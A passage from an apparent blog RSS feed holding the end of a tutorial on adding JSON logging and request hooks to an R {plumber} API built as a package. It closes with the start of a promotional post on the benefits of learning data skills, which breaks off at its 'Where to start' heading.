&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# formatter and convert back to a list&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; jsonlite&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;fromJSON&lt;/span&gt;(msg)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sapply&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; msg, &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(msg) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# reformat the output&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; jsonlite&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;toJSON&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(json[fields], data), auto_unbox &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }, generator &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;deparse&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;match.call&lt;/span&gt;()))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Notice how the data in the log request now appears as top-level fields of the JSON, rather than being
stringified under &lt;code&gt;msg&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;logger&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;log_layout&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;layout_json_custom&lt;/span&gt;(fields &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;level&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;logger&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;log_info&lt;/span&gt;(x, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; y)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; {&amp;#34;level&amp;#34;:&amp;#34;INFO&amp;#34;,&amp;#34;1&amp;#34;:&amp;#34;foo&amp;#34;,&amp;#34;y&amp;#34;:&amp;#34;bar&amp;#34;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;logger&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;log_info&lt;/span&gt;(request &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;meaning of life&amp;#34;&lt;/span&gt;, response &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; z)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; {&amp;#34;level&amp;#34;:&amp;#34;INFO&amp;#34;,&amp;#34;request&amp;#34;:&amp;#34;meaning of life&amp;#34;,&amp;#34;response&amp;#34;:42}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="a-setup-function-then"&gt;A setup function then&lt;/h3&gt;
&lt;p&gt;Following on from all of the above, we could add a setup function to our API package:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;#39; Set up default logger&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;#39; Creates a rotating file log using json format, see&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;#39; \link[logger]{appender_file} for details.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;#39; @param dir directory path for logs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;#39; @export&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;setup_logger &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(dir &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;./API_logs&amp;#34;&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dir.exists&lt;/span&gt;(dir)) &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dir.create&lt;/span&gt;(dir)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; f &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;normalizePath&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;path.expand&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;file.path&lt;/span&gt;(dir, &lt;span style="color:#a5d6ff"&gt;&amp;#34;log&amp;#34;&lt;/span&gt;)), mustWork &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; logger&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;log_formatter&lt;/span&gt;(logger&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;formatter_json)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; logger&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;log_layout&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;layout_json_custom&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fields &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;time&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;level&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;ns&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;ns_pkg_version&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;r_version&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; logger&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;log_appender&lt;/span&gt;(logger&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;appender_tee&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; f, max_lines &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2000L&lt;/span&gt;, max_files &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;20L&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We would then just stick a call to &lt;code&gt;setup_logger()&lt;/code&gt; at the top of our entrypoint script for running
the API.&lt;/p&gt;
&lt;h2 id="automatic-logging-with-hooks"&gt;Automatic logging with hooks&lt;/h2&gt;
&lt;p&gt;We can leverage &lt;a href="https://www.rplumber.io/reference/pr_hook.html" rel="external"&gt;{plumber} hooks&lt;/a&gt; to add some automatic logging
at various points in the lifecycle of a request.&lt;/p&gt;
&lt;p&gt;For example, we might be interested in logging all incoming requests and the data sent with them. Note that
the data received by your application for, say, a POST request is a stream. This means that once it has been read,
you need to set the stream back to the beginning before it can be read again; otherwise subsequent attempts to read
the data (for example when {plumber} passes the request to the function handling a particular endpoint) will return nothing.&lt;/p&gt;
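&lt;p&gt;To make the rewind requirement concrete, here is a minimal sketch using a toy stand-in for the request body stream. The helper &lt;code&gt;make_fake_stream()&lt;/code&gt; is hypothetical and written only for illustration; it is not part of {plumber}, and simply mimics the &lt;code&gt;read()&lt;/code&gt; and &lt;code&gt;rewind()&lt;/code&gt; methods used on &lt;code&gt;req$rook.input&lt;/code&gt;.&lt;/p&gt;
&lt;pre&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical stand-in for req$rook.input: a cursor over the body bytes
make_fake_stream = function(text) {
  bytes = charToRaw(text)
  state = new.env()
  state$pos = 0L
  list(
    # return everything after the cursor, then move the cursor to the end
    read = function() {
      out = utils::tail(bytes, length(bytes) - state$pos)
      state$pos = length(bytes)
      out
    },
    # move the cursor back to the start
    rewind = function() {
      state$pos = 0L
      invisible(NULL)
    }
  )
}

stream = make_fake_stream('{"x": 1}')
first = rawToChar(stream$read())   # the full body
second = rawToChar(stream$read())  # "" because the stream is exhausted
stream$rewind()
third = rawToChar(stream$read())   # the full body again
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The second read comes back empty, which is what an endpoint handler would see if a logging hook consumed the body without rewinding afterwards.&lt;/p&gt;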
&lt;p&gt;So we write a function to parse the data in a request object:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# extract request data from req environment&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;parse_req_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(req) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# if POST we will have content_length &amp;gt; 0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; ((&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.null&lt;/span&gt;(req&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;CONTENT_LENGTH)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;||&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.integer&lt;/span&gt;(req&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;CONTENT_LENGTH) &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0L&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;(&lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# rewind first as well, it seems plumber does not rewind the stream&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; req&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;rook.input&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;rewind&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rawToChar&lt;/span&gt;(req&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;rook.input&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;read&lt;/span&gt;())
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# rewind the stream before passing it on&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# as req is env (pass by reference)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# we need to do this to ensure the stream is available for&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# internal plumber methods/functions.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; req&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;rook.input&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;rewind&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; jsonlite&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;fromJSON&lt;/span&gt;(data)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and a function that will take the place of a hook for the pre-route stage of a request.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pre_route &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(req, res) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;parse_req_data&lt;/span&gt;(req)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; logger&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;log_info&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; method &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; req&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;REQUEST_METHOD, path &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; req&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;PATH_INFO,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; origin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; req&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;REMOTE_ADDR,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; data
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With all that in place we could create a simple function for adding the hooks to our plumber API&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;#39; default hooks for API&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;#39; Adds a default set of hooks (currently only&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;#39; pre route) to the API. These hooks will be used for&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;#39; logging interactions with the running api.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;#39; @param api a Plumber api object&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;#39; @return a Plumber api object with added hooks&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;#39; @export&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;add_default_hooks &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(api) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plumber&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;pr_hooks&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; api, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; preroute &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pre_route
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you have been following the series, our entrypoint script would now look like&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# updated for base R pipe&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;setup_logger&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_internal_routes&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;create_routes&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;generate_api&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;add_default_hooks&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This version of the cookieCutter package can be found at our &lt;a href="https://github.com/jumpingrivers/blog/tree/main/blogs/r-api-as-package-logging" rel="external"&gt;GitHub blog repository&lt;/a&gt;.&lt;/p&gt;
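&lt;p&gt;The same pattern extends to other stages of the request lifecycle. As a sketch only (it is not part of the cookieCutter package, and the names &lt;code&gt;post_serialize()&lt;/code&gt; and &lt;code&gt;add_response_hook()&lt;/code&gt; are hypothetical), a hook registered at {plumber}&amp;rsquo;s &lt;code&gt;postserialize&lt;/code&gt; stage could log the status code of each response, assuming the logger has been configured with the JSON formatter as in &lt;code&gt;setup_logger()&lt;/code&gt;.&lt;/p&gt;
&lt;pre&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical hook: log the outcome of each request after serialisation
post_serialize = function(req, res) {
  logger::log_info(
    method = req$REQUEST_METHOD, path = req$PATH_INFO,
    status = res$status
  )
}

# Hypothetical helper: register the hook on an existing Plumber api object
add_response_hook = function(api) {
  plumber::pr_hook(api, "postserialize", post_serialize)
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Because this hook does not take a &lt;code&gt;value&lt;/code&gt; argument, it only observes the response and leaves the response body untouched.&lt;/p&gt;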
&lt;p&gt;That&amp;rsquo;s it for this installment. There are other things you might choose to log automatically in a running application at different stages
of the request lifecycle, or indeed in other parts of your code base, but in the interest of keeping this to a manageable length we will conclude here.
The next installment in this series will look at some of the things we learned about testing {plumber} APIs and their functions within the context of {testthat}
tests in an R package. Stay tuned!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/api-as-a-package-logging/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>The Benefits of Learning Data Skills</title><link>https://www.jumpingrivers.com/blog/benefits-of-learning-data-skills/</link><pubDate>Tue, 20 Sep 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/benefits-of-learning-data-skills/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/benefits-of-learning-data-skills/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/benefits-of-learning-data-skills/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;It will come as no great surprise that here at Jumping Rivers, we are huge advocates for &lt;a href="https://www.jumpingrivers.com/training/all-courses/" rel="external"&gt;learning data skills&lt;/a&gt;. There are many benefits to learning at least some basic data skills, even if you don&amp;rsquo;t work explicitly with data.&lt;/p&gt;
&lt;p&gt;We all benefit from some form of data science every day, even if we don&amp;rsquo;t realise it - the weather forecast is based on analysis of the weather patterns in the atmosphere and what that has resulted in previously; the placement of road safety equipment (speed cameras, SLOW signs, etc) is based on analysis of previous accidents; online advertising is based on you as a user - how else would they do this without analysis of your data to find out what to show you?&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-benefits-of-learning-data-skills"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;/p&gt;
&lt;h3 id="benefits"&gt;Benefits&lt;/h3&gt;
&lt;p&gt;These are some of the places that we encounter data science in our day to day lives, but how can learning some data skills yourself benefit you in your career?&lt;/p&gt;
&lt;h4 id="informed-decision-making"&gt;Informed decision making&lt;/h4&gt;
&lt;p&gt;Having at least some basic data skills allows you to make more informed decisions, and more quickly - if you can analyse the data yourself, you don&amp;rsquo;t need to have lengthy back-and-forths with someone else, while you try to explain what you need, and they try to match that - you can just do exactly what you want, straight away.&lt;/p&gt;
&lt;h4 id="relevant-marketing"&gt;Relevant marketing&lt;/h4&gt;
&lt;p&gt;Being able to analyse the outcomes of marketing decisions is an incredibly valuable asset for any company. You want to spend your time and money on things that work - if you, as a person in marketing, can analyse the results of your marketing campaigns, you can make real time decisions based on your desired outcomes.&lt;/p&gt;
&lt;h4 id="problem-solving"&gt;Problem solving&lt;/h4&gt;
&lt;p&gt;One of the main skills we gain from data exploration is problem solving - data science consists of solving a whole bunch of problems one after the other, except at the end, instead of having a complete picture, you&amp;rsquo;ll have a deeper knowledge of your business and client needs!&lt;/p&gt;
&lt;h4 id="its-everywhere"&gt;It&amp;rsquo;s everywhere&lt;/h4&gt;
&lt;p&gt;Data science is being utilised by everyone - it doesn&amp;rsquo;t matter what industry you&amp;rsquo;re interested in joining, if you have data skills, someone will be looking for someone like you to take charge of and make sense of their data!&lt;/p&gt;
&lt;h3 id="where-to-start"&gt;Where to start&lt;/h3&gt;
